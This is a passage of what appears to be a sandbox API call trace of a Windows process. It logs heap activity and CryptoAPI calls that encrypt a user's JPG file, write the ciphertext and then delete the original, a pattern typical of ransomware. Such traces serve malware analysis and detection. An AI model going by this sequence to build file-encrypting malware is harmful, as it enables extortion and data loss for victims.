lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0134.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ca) returned 0x49aa010 [0134.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0134.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ca) returned 0x49d05c0 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0134.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0134.804] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0134.805] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0134.806] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0134.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0134.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0134.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0134.806] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0134.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0134.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.807] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0134.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0134.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.808] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0134.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0134.808] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0134.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0134.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0134.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0134.809] CryptGetKeyParam (in: hKey=0x41ac440, dwParam=0x7, pbData=0x43e2940, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2940*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0134.809] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb1f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.810] CryptEncrypt (in: hKey=0x41ac440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x132ca, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x132d0) returned 1 [0134.810] CharLowerBuffW (in: lpsz="byte[78545]", cchLength=0xb | out: lpsz="byte[78545]") returned 0xb [0134.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.810] CryptEncrypt (in: hKey=0x41ac440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e538*=0x132ca, dwBufLen=0x132d0 | out: pbData=0x48f0048*, pdwDataLen=0x144e538*=0x132d0) returned 1 [0134.810] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.810] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x132d0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x132d0, lpOverlapped=0x0) returned 1 [0134.813] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cadf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0134.813] CryptDestroyKey (hKey=0x41ac440) returned 1 [0134.813] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.813] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0134.813] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.814] FreeLibrary (hLibModule=0x756e0000) returned 1 [0134.814] CloseHandle (hObject=0x258) returned 1 [0134.853] CloseHandle (hObject=0x2a0) returned 1 [0134.856] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg", lpFilePart=0x0) returned 0x30 [0134.856] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\phzrcch.jpg")) returned 0x20 [0134.856] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c618140, ftCreationTime.dwHighDateTime=0x1d5ee39, ftLastAccessTime.dwLowDateTime=0x494d4a60, ftLastAccessTime.dwHighDateTime=0x1d5e589, ftLastWriteTime.dwLowDateTime=0x494d4a60, ftLastWriteTime.dwHighDateTime=0x1d5e589, nFileSizeHigh=0x0, nFileSizeLow=0x132ca, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="PhzRCCH.jpg", cAlternateFileName="")) returned 0x41ac640 [0134.856] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\phzrcch.jpg")) returned 1 [0134.932] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c618140, ftCreationTime.dwHighDateTime=0x1d5ee39, ftLastAccessTime.dwLowDateTime=0x494d4a60, ftLastAccessTime.dwHighDateTime=0x1d5e589, ftLastWriteTime.dwLowDateTime=0x494d4a60, ftLastWriteTime.dwHighDateTime=0x1d5e589, nFileSizeHigh=0x0, nFileSizeLow=0x132ca, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="PhzRCCH.jpg", cAlternateFileName="")) returned 0 [0134.932] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0134.932] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 